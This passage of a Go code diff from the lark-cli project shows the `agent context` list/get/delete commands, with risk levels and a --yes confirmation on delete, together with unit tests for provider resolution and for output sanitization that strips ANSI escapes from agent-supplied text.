t.Errorf("malformed-ref hint should teach the ref shape, got %q", p.Hint)
}
}
// TestResolveProvider_UnknownScheme rejects an unregistered provider scheme.
func TestResolveProvider_UnknownScheme(t *testing.T) {
f, _, _, _ := cmdutil.TestFactory(t, &core.CliConfig{AppID: "cli_x", AppSecret: "fake-secret", Brand: core.BrandFeishu})
cmd := resolveCmd(t, true, "bot")
_, _, err := resolveProvider(f, cmd, "nope:agt_x", "bot")
if err == nil {
t.Fatal("an unknown scheme should error")
}
if !errs.IsValidation(err) {
t.Fatalf("should be a validation error, got %T", err)
}
// An unknown scheme points the caller at `agent list` for discovery.
p, _ := errs.ProblemOf(err)
if p == nil || !strings.Contains(p.Hint, "agent list") {
t.Errorf("unknown-scheme hint should point to `agent list`, got %+v", p)
}
}
// TestResolveProvider_IdentityRejected fails the user|bot whitelist when an
// unsupported --as is explicitly requested; the provider is never constructed.
func TestResolveProvider_IdentityRejected(t *testing.T) {
f, _, _, _ := cmdutil.TestFactory(t, &core.CliConfig{AppID: "cli_x", AppSecret: "fake-secret", Brand: core.BrandFeishu})
cmd := resolveCmd(t, true, "admin")
p, _, err := resolveProvider(f, cmd, "example:agt_x", "admin")
if err == nil {
t.Fatal("an unsupported identity should error")
}
if p != nil {
t.Error("should not return a provider when identity validation fails")
}
if !errs.IsValidation(err) {
t.Fatalf("should be a validation error, got %T", err)
}
}
// TestResolveProvider_APIClientError surfaces a NewAPIClient failure (Config
// error) before any provider is built.
func TestResolveProvider_APIClientError(t *testing.T) {
f, _, _, _ := cmdutil.TestFactory(t, &core.CliConfig{AppID: "cli_x", AppSecret: "fake-secret", Brand: core.BrandFeishu})
f.Config = func() (*core.CliConfig, error) { return nil, errors.New("config boom") }
cmd := resolveCmd(t, true, "bot")
if _, _, err := resolveProvider(f, cmd, "example:agt_x", "bot"); err == nil {
t.Fatal("a Config error should propagate")
}
}
// unconfiguredFactory returns a Factory whose Config() errors (simulating a
// fresh install that hasn't run `config init`), so NewAPIClient fails. Used to
// pin that the API-free paths never reach the config gate.
func unconfiguredFactory(t *testing.T) *cmdutil.Factory {
t.Helper()
f, _, _, _ := cmdutil.TestFactory(t, nil)
f.Config = func() (*core.CliConfig, error) { return nil, errors.New("not configured") }
return f
}
// TestResolveProviderNoClient_WorksWhenUnconfigured guards the acceptance
// regression: the API-free resolution path must NOT touch NewAPIClient, so it
// succeeds even when Config errors, while the client-backed resolveProvider
// still fails at the config gate.
func TestResolveProviderNoClient_WorksWhenUnconfigured(t *testing.T) {
f := unconfiguredFactory(t)
cmd := resolveCmd(t, true, "bot")
p, id, err := resolveProviderNoClient(f, cmd, "example:agt_x", "bot")
if err != nil {
t.Fatalf("no-client resolution should succeed when unconfigured: %v", err)
}
if p == nil || id != core.AsBot {
t.Fatalf("should return provider + bot identity, got p=%v id=%s", p, id)
}
if _, _, err := resolveProvider(f, cmd, "example:agt_x", "bot"); err == nil {
t.Fatal("the client path should error when unconfigured (config gate)")
}
}
// TestResolveProviderNoClient_ValidatesRefBeforeConfig pins that a malformed
// ref / unknown scheme is a validation error (exit 2) even when unconfigured —
// it must not be masked by not_configured.
func TestResolveProviderNoClient_ValidatesRefBeforeConfig(t *testing.T) {
f := unconfiguredFactory(t)
cmd := resolveCmd(t, true, "bot")
for _, ref := range []string{"no-colon", "nope:agt_x"} {
_, _, err := resolveProviderNoClient(f, cmd, ref, "bot")
if err == nil {
t.Fatalf("ref %q should also report a validation error when unconfigured", ref)
}
if !errs.IsValidation(err) {
t.Fatalf("ref %q should be a validation error, got %T", ref, err)
}
}
}
// TestAgentCardRun_WorksUnconfigured guards the acceptance regression: `agent
// card` is statically synthesized and must succeed unconfigured, never hitting
// the config gate.
func TestAgentCardRun_WorksUnconfigured(t *testing.T) {
f := unconfiguredFactory(t)
cmd := resolveCmd(t, true, "bot")
if err := agentCardRun(&cardOptions{Factory: f, Cmd: cmd, Ref: "example:echo", As: "bot", Format: "json"}); err != nil {
t.Fatalf("agent card should succeed when unconfigured (API-free): %v", err)
}
}
// TestAgentSendRun_DryRunWorksUnconfigured guards the acceptance regression:
// `agent send --dry-run` is a client-side preview and must succeed
// unconfigured — the example echo card declares no parameters, so no --param is
// needed. A malformed --param must still surface as validation, unconfigured.
func TestAgentSendRun_DryRunWorksUnconfigured(t *testing.T) {
f := unconfiguredFactory(t)
cmd := resolveCmd(t, true, "bot")
err := agentSendRun(&sendOptions{
Factory: f, Cmd: cmd, Ref: "example:echo", Text: "hi", DryRun: true, As: "bot",
})
if err != nil {
t.Fatalf("send --dry-run should succeed when unconfigured: %v", err)
}
// A malformed --param (no '=') is still a validation error, unconfigured.
err = agentSendRun(&sendOptions{
Factory: f, Cmd: cmd, Ref: "example:echo", Text: "hi",
Params: []string{"noequals"}, DryRun: true, As: "bot",
})
if err == nil || !errs.IsValidation(err) {
t.Fatalf("a malformed --param should report a validation error when unconfigured, got %v", err)
}
}

248
cmd/agent/context.go Normal file
View File

@@ -0,0 +1,248 @@
// Copyright (c) 2026 Lark Technologies Pte. Ltd.
// SPDX-License-Identifier: MIT
package agent
import (
"fmt"
"github.com/spf13/cobra"
iagent "github.com/larksuite/cli/internal/agent"
"github.com/larksuite/cli/internal/cmdutil"
"github.com/larksuite/cli/internal/output"
)
// contextOptions holds all inputs for the `agent context list|get|delete`
// leaves. A single struct backs all three so the shared fields (Factory, Cmd,
// Ref, As) are wired once; each RunE reads only the fields its verb needs.
type contextOptions struct {
Factory *cmdutil.Factory
Cmd *cobra.Command
Ref string
CtxID string
Yes bool
As string
Format string
}
// NewCmdAgentContext builds the `agent context` command group: manage a remote
// agent's multi-turn contexts (requires card multi_turn=true). It is a pure group with
// no RunE so an unknown subcommand is reported rather than silently swallowed.
func NewCmdAgentContext(f *cmdutil.Factory) *cobra.Command {
cmd := &cobra.Command{
Use: "context",
Short: "Manage a remote agent's multi-turn contexts (sessions)",
Long: "context list <agent_ref> lists sessions; context get <agent_ref> <ctx-id> shows session detail; context delete <agent_ref> <ctx-id> deletes a session (high-risk, needs --yes).",
}
cmd.AddCommand(NewCmdAgentContextList(f))
cmd.AddCommand(NewCmdAgentContextGet(f))
cmd.AddCommand(NewCmdAgentContextDelete(f))
return cmd
}
// NewCmdAgentContextList builds `agent context list <ref>`: enumerate the
// agent's multi-turn contexts into {contexts:[...]} with a meta.count. Risk=read.
func NewCmdAgentContextList(f *cmdutil.Factory) *cobra.Command {
opts := &contextOptions{Factory: f}
cmd := &cobra.Command{
Use: "list <agent_ref>",
Short: "List a remote agent's multi-turn contexts",
Long: "List the multi-turn contexts (sessions) of the agent addressed by agent_ref.",
Args: exactArgsWithUsage(1),
RunE: func(cmd *cobra.Command, args []string) error {
if err := validateFormat(opts.Format); err != nil {
return err
}
opts.Cmd = cmd
opts.Ref = args[0]
return agentContextListRun(opts)
},
}
cmd.Flags().StringVar(&opts.Format, "format", "json", formatFlagHelp)
cmd.Flags().String("jq", "", "用 jq 表达式过滤 JSON 输出")
addAsFlag(cmd, f, &opts.As)
cmdutil.SetRisk(cmd, cmdutil.RiskRead)
return cmd
}
// NewCmdAgentContextGet builds `agent context get <ref> <ctx-id>`: fetch a
// single context's detail. Risk=read.
func NewCmdAgentContextGet(f *cmdutil.Factory) *cobra.Command {
opts := &contextOptions{Factory: f}
cmd := &cobra.Command{
Use: "get <agent_ref> <ctx-id>",
Short: "Show the detail of a single multi-turn context",
Long: "Show the detail of the multi-turn context ctx-id under the agent addressed by agent_ref.",
Args: exactArgsWithUsage(2),
RunE: func(cmd *cobra.Command, args []string) error {
if err := validateFormat(opts.Format); err != nil {
return err
}
opts.Cmd = cmd
opts.Ref = args[0]
opts.CtxID = args[1]
return agentContextGetRun(opts)
},
}
cmd.Flags().StringVar(&opts.Format, "format", "json", formatFlagHelp)
cmd.Flags().String("jq", "", "用 jq 表达式过滤 JSON 输出")
addAsFlag(cmd, f, &opts.As)
cmdutil.SetRisk(cmd, cmdutil.RiskRead)
return cmd
}
// NewCmdAgentContextDelete builds `agent context delete <ref> <ctx-id>`: destroy
// a multi-turn context. Deletion is irreversible, so it is high-risk-write and
// requires --yes; without it the command returns a confirmation_required error
// (exit 10) before touching the API. Risk=high-risk-write.
func NewCmdAgentContextDelete(f *cmdutil.Factory) *cobra.Command {
opts := &contextOptions{Factory: f}
cmd := &cobra.Command{
Use: "delete <agent_ref> <ctx-id>",
Short: "Delete a remote agent's multi-turn context (high-risk, needs --yes)",
Long: "Delete the multi-turn context ctx-id under the agent addressed by agent_ref. Deletion is irreversible and requires --yes to confirm; otherwise it returns confirmation_required (exit 10).",
Args: exactArgsWithUsage(2),
RunE: func(cmd *cobra.Command, args []string) error {
if err := validateFormat(opts.Format); err != nil {
return err
}
opts.Cmd = cmd
opts.Ref = args[0]
opts.CtxID = args[1]
return agentContextDeleteRun(opts)
},
}
cmd.Flags().BoolVar(&opts.Yes, "yes", false, "确认删除(高危操作,不加则返回 exit 10")
cmd.Flags().StringVar(&opts.Format, "format", "json", formatFlagHelp)
cmd.Flags().String("jq", "", "用 jq 表达式过滤 JSON 输出")
addAsFlag(cmd, f, &opts.As)
cmdutil.SetRisk(cmd, cmdutil.RiskHighRiskWrite)
return cmd
}
// agentContextListRun runs `context list`: resolves the provider, lists contexts
// and emits {contexts:[...]} with meta.count.
func agentContextListRun(opts *contextOptions) error {
f := opts.Factory
p, id, err := resolveProvider(f, opts.Cmd, opts.Ref, opts.As)
if err != nil {
return err
}
// Capability gate before the API call: multi_turn is derived from ListContexts
// being wired, so a provider without it returns unsupported_capability.
if p.ListContexts == nil {
return capabilityError(opts.Ref, "context list", iagent.CapMultiTurn)
}
// Local scope preflight: after resolveProvider, before the API call.
if err := preflightScopesForRef(f, id, opts.Ref); err != nil {
return err
}
contexts, err := p.ListContexts(opts.Cmd.Context())
if err != nil {
return err
}
// pretty is a human view only; a --jq expression implies structured JSON.
if opts.Format == "pretty" && jqExpr(opts.Cmd) == "" {
printContextsTSV(f.IOStreams.Out, contexts)
return nil
}
env := output.Envelope{
OK: true,
Identity: string(id),
Data: map[string]interface{}{"contexts": contexts},
Meta: &output.Meta{Count: len(contexts)},
Notice: output.GetNotice(),
}
if jq := jqExpr(opts.Cmd); jq != "" {
return output.JqFilter(f.IOStreams.Out, env, jq)
}
output.PrintJson(f.IOStreams.Out, env)
return nil
}
// agentContextGetRun runs `context get`: resolves the provider, fetches the
// context detail and emits it.
func agentContextGetRun(opts *contextOptions) error {
f := opts.Factory
p, id, err := resolveProvider(f, opts.Cmd, opts.Ref, opts.As)
if err != nil {
return err
}
// Capability gate before the API call.
if p.GetContext == nil {
return capabilityError(opts.Ref, "context get", iagent.CapMultiTurn)
}
// Local scope preflight: after resolveProvider, before the API call.
if err := preflightScopesForRef(f, id, opts.Ref); err != nil {
return err
}
detail, err := p.GetContext(opts.Cmd.Context(), opts.CtxID)
if err != nil {
return err
}
if detail != nil {
// Derive IsTerminal from State (single source of truth) for the embedded
// task summaries before emission.
detail.Tasks = normalizeTaskSummaries(detail.Tasks)
}
// pretty is a human view only; a --jq expression implies structured JSON.
if opts.Format == "pretty" && jqExpr(opts.Cmd) == "" {
printContextDetailPretty(f.IOStreams.Out, detail)
return nil
}
env := output.Envelope{
OK: true,
Identity: string(id),
Data: detail,
Notice: output.GetNotice(),
}
if jq := jqExpr(opts.Cmd); jq != "" {
return output.JqFilter(f.IOStreams.Out, env, jq)
}
output.PrintJson(f.IOStreams.Out, env)
return nil
}
// agentContextDeleteRun runs `context delete`. The --yes confirmation guard runs
// first so a missing confirmation returns confirmation_required (exit 10) before
// any provider is built and holds even under a nil Factory. Only a
// confirmed delete reaches resolveProvider + DeleteContext.
func agentContextDeleteRun(opts *contextOptions) error {
if !opts.Yes {
return cmdutil.RequireConfirmation("agent context delete")
}
f := opts.Factory
p, id, err := resolveProvider(f, opts.Cmd, opts.Ref, opts.As)
if err != nil {
return err
}
// Capability gate before the API call.
if p.DeleteContext == nil {
return capabilityError(opts.Ref, "context delete", iagent.CapMultiTurn)
}
// Local scope preflight: after resolveProvider, before the API call.
if err := preflightScopesForRef(f, id, opts.Ref); err != nil {
return err
}
if err := p.DeleteContext(opts.Cmd.Context(), opts.CtxID); err != nil {
return err
}
// pretty is a human view only; a --jq expression implies structured JSON.
if opts.Format == "pretty" && jqExpr(opts.Cmd) == "" {
fmt.Fprintf(f.IOStreams.Out, "context_id: %s\ndeleted: true\n", kvValue(opts.CtxID))
return nil
}
env := output.Envelope{
OK: true,
Identity: string(id),
Data: map[string]interface{}{"context_id": opts.CtxID, "deleted": true},
Notice: output.GetNotice(),
}
if jq := jqExpr(opts.Cmd); jq != "" {
return output.JqFilter(f.IOStreams.Out, env, jq)
}
output.PrintJson(f.IOStreams.Out, env)
return nil
}

408
cmd/agent/context_test.go Normal file
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@@ -0,0 +1,408 @@
// Copyright (c) 2026 Lark Technologies Pte. Ltd.
// SPDX-License-Identifier: MIT
package agent
import (
"context"
"encoding/json"
"strings"
"testing"
"github.com/spf13/cobra"
"github.com/larksuite/cli/errs"
iagent "github.com/larksuite/cli/internal/agent"
"github.com/larksuite/cli/internal/cmdutil"
"github.com/larksuite/cli/internal/core"
"github.com/larksuite/cli/internal/httpmock"
"github.com/larksuite/cli/internal/output"
)
// contextCmdCtx builds a `lark-cli agent context <leaf>` command whose --as flag
// is set to bot so ResolveAs honors it verbatim, and carries a context.
func contextCmdCtx(t *testing.T, leaf string) *cobra.Command {
t.Helper()
root := &cobra.Command{Use: "lark-cli"}
group := &cobra.Command{Use: "agent"}
grp := &cobra.Command{Use: "context"}
l := &cobra.Command{Use: leaf}
root.AddCommand(group)
group.AddCommand(grp)
grp.AddCommand(l)
l.Flags().String("as", "", "identity")
if err := l.Flags().Set("as", "bot"); err != nil {
t.Fatal(err)
}
l.SetContext(context.Background())
return l
}
// contextTestOpts wires a contextOptions against a real (test) Factory,
// addressing the scripted fakeflow agent agt_x under a bot identity. The
// Factory's httpmock registry holds zero stubs, so any HTTP attempt fails the
// test; provider behavior is scripted via setScripted.
func contextTestOpts(t *testing.T, leaf string) (*contextOptions, *httpmock.Registry) {
t.Helper()
registerScripted()
cfg := &core.CliConfig{AppID: "cli_x", AppSecret: "fake-secret", Brand: core.BrandFeishu}
f, _, _, reg := cmdutil.TestFactory(t, cfg)
return &contextOptions{
Factory: f,
Cmd: contextCmdCtx(t, leaf),
Ref: "fakeflow:agt_x",
As: "bot",
}, reg
}
// TestContextDeleteRequiresYes pins that `context delete` without --yes is a
// confirmation_required error (exit 10), raised before any provider is built.
func TestContextDeleteRequiresYes(t *testing.T) {
err := agentContextDeleteRun(&contextOptions{Ref: "example:agt_x", CtxID: "c1", Yes: false})
if err == nil {
t.Fatal("context delete without --yes should report confirmation_required")
}
if !errs.IsConfirmationRequired(err) {
t.Fatalf("should be a confirmation_required error, got %T", err)
}
if code := output.ExitCodeOf(err); code != output.ExitConfirmationRequired {
t.Fatalf("exit code should be 10, got %d", code)
}
p, ok := errs.ProblemOf(err)
if !ok || p.Subtype != errs.SubtypeConfirmationRequired {
t.Fatalf("subtype should be confirmation_required, got %+v", p)
}
}
// TestContextDeleteWithYes pins the confirmed path: --yes reaches the provider,
// deletes the session, and emits a success envelope.
func TestContextDeleteWithYes(t *testing.T) {
opts, _ := contextTestOpts(t, "delete")
opts.CtxID = "sess_1"
opts.Yes = true
var deleted string
setScripted(t, scriptedHooks{deleteContext: func(ctxID string) error {
deleted = ctxID
return nil
}})
out := opts.Factory.IOStreams.Out.(interface{ Bytes() []byte })
if err := agentContextDeleteRun(opts); err != nil {
t.Fatalf("context delete --yes should not error: %v", err)
}
var env output.Envelope
if err := json.Unmarshal(out.Bytes(), &env); err != nil {
t.Fatalf("output should be valid envelope JSON: %v (%s)", err, string(out.Bytes()))
}
data, _ := env.Data.(map[string]interface{})
if data["context_id"] != "sess_1" || data["deleted"] != true {
t.Errorf("data should echo {context_id, deleted:true}, got %v", env.Data)
}
if deleted != "sess_1" {
t.Errorf("provider should receive the context id to delete, got %q", deleted)
}
}
// TestContextDeleteProviderError surfaces a provider DeleteContext failure
// (non-zero business code) after --yes passes.
func TestContextDeleteProviderError(t *testing.T) {
opts, _ := contextTestOpts(t, "delete")
opts.CtxID = "sess_1"
opts.Yes = true
setScripted(t, scriptedHooks{deleteContext: func(string) error {
return errs.NewAPIError(errs.SubtypeUnknown, "app ticket invalid").WithCode(99991663)
}})
if err := agentContextDeleteRun(opts); err == nil {
t.Fatal("a DeleteContext error should propagate")
}
}
// TestContextDeleteInvalidRef surfaces a malformed ref as a validation error
// after the --yes confirmation guard passes.
func TestContextDeleteInvalidRef(t *testing.T) {
f, _, _, _ := cmdutil.TestFactory(t, &core.CliConfig{AppID: "cli_x", AppSecret: "fake-secret", Brand: core.BrandFeishu})
err := agentContextDeleteRun(&contextOptions{Ref: "no-colon", CtxID: "c1", Yes: true, Cmd: contextCmdCtx(t, "delete"), As: "bot", Factory: f})
if err == nil {
t.Fatal("malformed ref should error")
}
if !errs.IsValidation(err) {
t.Fatalf("should be a validation error, got %T", err)
}
}
// TestContextListEmitsContexts pins that `context list` returns
// {contexts:[...]} with a meta.count.
func TestContextListEmitsContexts(t *testing.T) {
opts, _ := contextTestOpts(t, "list")
setScripted(t, scriptedHooks{listContexts: func() ([]iagent.ContextSummary, error) {
return []iagent.ContextSummary{
{ContextID: "sess_1", Title: "销售分析", CreatedAt: "2026-07-05T10:01:11+08:00"},
{ContextID: "sess_2"},
}, nil
}})
out := opts.Factory.IOStreams.Out.(interface{ Bytes() []byte })
if err := agentContextListRun(opts); err != nil {
t.Fatalf("context list should not error: %v", err)
}
var env output.Envelope
if err := json.Unmarshal(out.Bytes(), &env); err != nil {
t.Fatalf("output should be valid envelope JSON: %v (%s)", err, string(out.Bytes()))
}
data, _ := env.Data.(map[string]interface{})
contexts, ok := data["contexts"].([]interface{})
if !ok || len(contexts) != 2 {
t.Fatalf("data.contexts should have 2 entries, got %v", data["contexts"])
}
if env.Meta == nil || env.Meta.Count != 2 {
t.Errorf("meta.count should be 2, got %+v", env.Meta)
}
}
// TestContextListError surfaces a provider ListContexts failure.
func TestContextListError(t *testing.T) {
opts, _ := contextTestOpts(t, "list")
setScripted(t, scriptedHooks{listContexts: func() ([]iagent.ContextSummary, error) {
return nil, errs.NewAPIError(errs.SubtypeUnknown, "app ticket invalid").WithCode(99991663)
}})
if err := agentContextListRun(opts); err == nil {
t.Fatal("a ListContexts error should propagate")
}
}
// TestContextListInvalidRef surfaces a malformed ref as a validation error.
func TestContextListInvalidRef(t *testing.T) {
f, _, _, _ := cmdutil.TestFactory(t, &core.CliConfig{AppID: "cli_x", AppSecret: "fake-secret", Brand: core.BrandFeishu})
err := agentContextListRun(&contextOptions{Ref: "no-colon", Cmd: contextCmdCtx(t, "list"), As: "bot", Factory: f})
if err == nil {
t.Fatal("malformed ref should error")
}
if !errs.IsValidation(err) {
t.Fatalf("should be a validation error, got %T", err)
}
}
// TestContextGetEmitsDetail pins that `context get` returns a single context
// detail.
func TestContextGetEmitsDetail(t *testing.T) {
opts, _ := contextTestOpts(t, "get")
opts.CtxID = "sess_1"
setScripted(t, scriptedHooks{getContext: func(ctxID string) (*iagent.ContextDetail, error) {
return &iagent.ContextDetail{ContextID: ctxID, Title: "销售分析", CreatedAt: "2026-07-05T10:01:11+08:00"}, nil
}})
out := opts.Factory.IOStreams.Out.(interface{ Bytes() []byte })
if err := agentContextGetRun(opts); err != nil {
t.Fatalf("context get should not error: %v", err)
}
var env output.Envelope
if err := json.Unmarshal(out.Bytes(), &env); err != nil {
t.Fatalf("output should be valid envelope JSON: %v (%s)", err, string(out.Bytes()))
}
data, _ := env.Data.(map[string]interface{})
if data["context_id"] != "sess_1" {
t.Errorf("data.context_id should be sess_1, got %v", data["context_id"])
}
if data["title"] != "销售分析" {
t.Errorf("data.title should be echoed, got %v", data["title"])
}
}
// TestContextGetError surfaces a provider GetContext failure.
func TestContextGetError(t *testing.T) {
opts, _ := contextTestOpts(t, "get")
opts.CtxID = "sess_1"
setScripted(t, scriptedHooks{getContext: func(string) (*iagent.ContextDetail, error) {
return nil, errs.NewAPIError(errs.SubtypeUnknown, "app ticket invalid").WithCode(99991663)
}})
if err := agentContextGetRun(opts); err == nil {
t.Fatal("a GetContext error should propagate")
}
}
// TestContextGetInvalidRef surfaces a malformed ref as a validation error.
func TestContextGetInvalidRef(t *testing.T) {
f, _, _, _ := cmdutil.TestFactory(t, &core.CliConfig{AppID: "cli_x", AppSecret: "fake-secret", Brand: core.BrandFeishu})
err := agentContextGetRun(&contextOptions{Ref: "no-colon", CtxID: "c1", Cmd: contextCmdCtx(t, "get"), As: "bot", Factory: f})
if err == nil {
t.Fatal("malformed ref should error")
}
if !errs.IsValidation(err) {
t.Fatalf("should be a validation error, got %T", err)
}
}
// TestContextListWithJq exercises the --jq output branch for list.
func TestContextListWithJq(t *testing.T) {
opts, _ := contextTestOpts(t, "list")
opts.Cmd.Flags().String("jq", ".data.contexts | length", "")
setScripted(t, scriptedHooks{listContexts: func() ([]iagent.ContextSummary, error) {
return []iagent.ContextSummary{{ContextID: "sess_1"}}, nil
}})
if err := agentContextListRun(opts); err != nil {
t.Fatalf("context list --jq should not error: %v", err)
}
}
// TestContextListPretty exercises the --format pretty human-view branch for
// list: header TSV rows (not a JSON envelope), with the agent-controlled Title
// stripped of ANSI escapes.
func TestContextListPretty(t *testing.T) {
opts, _ := contextTestOpts(t, "list")
opts.Format = "pretty"
setScripted(t, scriptedHooks{listContexts: func() ([]iagent.ContextSummary, error) {
return []iagent.ContextSummary{
{ContextID: "sess_1", Title: "\x1b[2J销售分析", CreatedAt: "2026-07-05T10:01:11+08:00"},
}, nil
}})
out := opts.Factory.IOStreams.Out.(interface{ Bytes() []byte })
if err := agentContextListRun(opts); err != nil {
t.Fatalf("context list --format pretty should not error: %v", err)
}
s := string(out.Bytes())
if !strings.HasPrefix(s, "CONTEXT_ID\tCREATED_AT\tTITLE\n") {
t.Errorf("pretty output should start with a header row, got %q", s)
}
if !strings.Contains(s, "sess_1") || !strings.Contains(s, "销售分析") {
t.Errorf("pretty output should contain context_id and title, got %q", s)
}
if strings.Contains(s, "\x1b") {
t.Errorf("ANSI sequences in Title must be stripped: %q", s)
}
if strings.Contains(s, `"ok"`) {
t.Errorf("pretty output should be a human view, not a JSON envelope, got %q", s)
}
}
// TestContextGetWithJq pins the added --jq flag on context get: the envelope is
// filtered through the jq expression.
func TestContextGetWithJq(t *testing.T) {
opts, _ := contextTestOpts(t, "get")
opts.CtxID = "sess_1"
opts.Cmd.Flags().String("jq", "", "")
if err := opts.Cmd.Flags().Set("jq", ".data.context_id"); err != nil {
t.Fatal(err)
}
setScripted(t, scriptedHooks{getContext: func(ctxID string) (*iagent.ContextDetail, error) {
return &iagent.ContextDetail{ContextID: ctxID}, nil
}})
out := opts.Factory.IOStreams.Out.(interface{ Bytes() []byte })
if err := agentContextGetRun(opts); err != nil {
t.Fatalf("context get --jq should not error: %v", err)
}
got := strings.TrimSpace(string(out.Bytes()))
if !strings.Contains(got, "sess_1") || strings.Contains(got, `"ok"`) {
t.Errorf("--jq .data.context_id should output only the filtered result, got %q", got)
}
}
// TestContextGetPretty pins the added --format pretty branch on context get:
// key: value lines with the tasks count, title ANSI-stripped.
func TestContextGetPretty(t *testing.T) {
opts, _ := contextTestOpts(t, "get")
opts.CtxID = "sess_1"
opts.Format = "pretty"
setScripted(t, scriptedHooks{getContext: func(ctxID string) (*iagent.ContextDetail, error) {
return &iagent.ContextDetail{
ContextID: ctxID, Title: "\x1b[31m销售分析\x1b[0m",
Tasks: []iagent.TaskSummary{{TaskID: "chat_1", State: iagent.StateCompleted, IsTerminal: true}},
}, nil
}})
out := opts.Factory.IOStreams.Out.(interface{ Bytes() []byte })
if err := agentContextGetRun(opts); err != nil {
t.Fatalf("context get --format pretty should not error: %v", err)
}
s := string(out.Bytes())
for _, want := range []string{"context_id: sess_1", "title: 销售分析", "tasks: 1"} {
if !strings.Contains(s, want) {
t.Errorf("pretty output should contain %q, got %q", want, s)
}
}
if strings.Contains(s, "\x1b") {
t.Errorf("ANSI sequences in title must be stripped: %q", s)
}
}
// findSub returns the direct subcommand of cmd whose Name() == name, or nil.
func findSub(cmd *cobra.Command, name string) *cobra.Command {
for _, c := range cmd.Commands() {
if c.Name() == name {
return c
}
}
return nil
}
// TestNewCmdAgentContext_GroupHasSubcommands pins the group is a pure group (no
// RunE) with list/get/delete leaves.
func TestNewCmdAgentContext_GroupHasSubcommands(t *testing.T) {
cmd := NewCmdAgentContext(nil)
if cmd.RunE != nil || cmd.Run != nil {
t.Error("agent context group should not have RunE")
}
want := []string{"list", "get", "delete"}
for _, name := range want {
if findSub(cmd, name) == nil {
t.Errorf("missing subcommand context %s", name)
}
}
}
// TestNewCmdAgentContextList_ReadRisk pins list = read risk, ExactArgs(1), and
// the default flip: --format defaults to json.
func TestNewCmdAgentContextList_ReadRisk(t *testing.T) {
cmd := NewCmdAgentContextList(nil)
if level, ok := cmdutil.GetRisk(cmd); !ok || level != cmdutil.RiskRead {
t.Errorf("context list should be marked read risk, got level=%q ok=%v", level, ok)
}
if err := cmd.Args(cmd, []string{}); err == nil {
t.Error("context list missing ref should report an argument error (ExactArgs 1)")
}
if err := cmd.Args(cmd, []string{"example:x"}); err != nil {
t.Errorf("context list with a single ref should be valid: %v", err)
}
fl := cmd.Flags().Lookup("format")
if fl == nil || fl.DefValue != "json" {
t.Errorf("context list --format default should flip to json, got %+v", fl)
}
}
// TestNewCmdAgentContextGet_ReadRisk pins get = read risk, ExactArgs(2), and
// the added --format / --jq flags.
func TestNewCmdAgentContextGet_ReadRisk(t *testing.T) {
cmd := NewCmdAgentContextGet(nil)
if level, ok := cmdutil.GetRisk(cmd); !ok || level != cmdutil.RiskRead {
t.Errorf("context get should be marked read risk, got level=%q ok=%v", level, ok)
}
if err := cmd.Args(cmd, []string{"example:x"}); err == nil {
t.Error("context get missing ctx-id should report an argument error (ExactArgs 2)")
}
if err := cmd.Args(cmd, []string{"example:x", "c1"}); err != nil {
t.Errorf("context get ref+ctx-id should be valid: %v", err)
}
for _, name := range []string{"format", "jq"} {
if cmd.Flags().Lookup(name) == nil {
t.Errorf("context get should have a --%s flag", name)
}
}
}
// TestNewCmdAgentContextDelete_HighRiskWrite pins delete = high-risk-write risk,
// ExactArgs(2), a --yes flag, and the added --format / --jq flags.
func TestNewCmdAgentContextDelete_HighRiskWrite(t *testing.T) {
cmd := NewCmdAgentContextDelete(nil)
if level, ok := cmdutil.GetRisk(cmd); !ok || level != cmdutil.RiskHighRiskWrite {
t.Errorf("context delete should be marked high-risk-write risk, got level=%q ok=%v", level, ok)
}
if err := cmd.Args(cmd, []string{"example:x"}); err == nil {
t.Error("context delete missing ctx-id should report an argument error (ExactArgs 2)")
}
if cmd.Flags().Lookup("yes") == nil {
t.Error("context delete should have a --yes flag")
}
for _, name := range []string{"format", "jq"} {
if cmd.Flags().Lookup(name) == nil {
t.Errorf("context delete should have a --%s flag", name)
}
}
}

183
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// Copyright (c) 2026 Lark Technologies Pte. Ltd.
// SPDX-License-Identifier: MIT
// This file holds the --format surface shared by every agent leaf: value
// validation, the pretty renderers (task key:value view, list
// header-TSV views) with ANSI stripping for agent-controlled text, and the
// arg-count validators that wrap cobra's bare "accepts N arg(s)" into a typed
// validation error carrying a 用法 hint.
package agent
import (
"fmt"
"io"
"strings"
"github.com/spf13/cobra"
"github.com/larksuite/cli/errs"
iagent "github.com/larksuite/cli/internal/agent"
"github.com/larksuite/cli/internal/validate"
)
// formatFlagHelp is the uniform --format help text across every agent leaf
// (json is the tree-wide default, pretty the human opt-in).
const formatFlagHelp = "output format: json (default) | pretty"
// validateFormat rejects any --format outside json|pretty as a
// validation/invalid_argument error (exit 2). The empty string is accepted for
// options structs built directly in tests; the registered flag default is
// "json" so a CLI invocation never passes "".
func validateFormat(format string) error {
switch format {
case "", "json", "pretty":
return nil
}
return errs.NewValidationError(errs.SubtypeInvalidArgument,
"不支持的 --format 值 %q", format).
WithParam("--format").
WithHint("合法值: json | pretty")
}
// stripANSI sanitizes agent-controlled text before it is written raw to a
// terminal by a pretty renderer, preventing terminal escape-sequence injection.
// It delegates to validate.SanitizeForTerminal, which is a superset of the
// mandated CSI regex:
// it also drops OSC sequences, bare ESC / C0 control bytes and dangerous
// Unicode. JSON output paths must NOT use this — programmatic consumers get
// the raw data.
func stripANSI(s string) string {
return validate.SanitizeForTerminal(s)
}
// kvValue sanitizes an agent-controlled value for a single-line "key: value"
// pretty row: ANSI-stripped, then \n/\t collapsed to single spaces —
// SanitizeForTerminal deliberately preserves those, so without this a value
// like "done\nstate: completed" would forge an adjacent field row. TSV
// renderers keep plain stripANSI under their documented no-escape exemption.
func kvValue(s string) string {
s = stripANSI(s)
s = strings.ReplaceAll(s, "\n", " ")
return strings.ReplaceAll(s, "\t", " ")
}
// truncateRunes caps s at max runes, appending an ellipsis when truncated.
func truncateRunes(s string, max int) string {
r := []rune(s)
if len(r) <= max {
return s
}
return string(r[:max]) + "…"
}
// firstTextOf returns the first text Part carried by the task's messages
// (the first text message), or "".
func firstTextOf(task *iagent.AgentTask) string {
for _, m := range task.Messages {
for _, p := range m.Parts {
if p.Type == "text" && p.Text != "" {
return p.Text
}
}
}
return ""
}
// printTaskPretty renders the task-class pretty view: line-per-field
// key: value with state / task_id / context_id / first text message truncated
// to 120 runes / artifacts count. Every agent-controlled string goes through
// kvValue (ANSI strip + newline/tab neutralization) so it can neither inject
// terminal sequences nor forge an adjacent field row.
func printTaskPretty(w io.Writer, task *iagent.AgentTask) {
if task == nil {
fmt.Fprintln(w, "(no task)")
return
}
fmt.Fprintf(w, "state: %s\n", task.State)
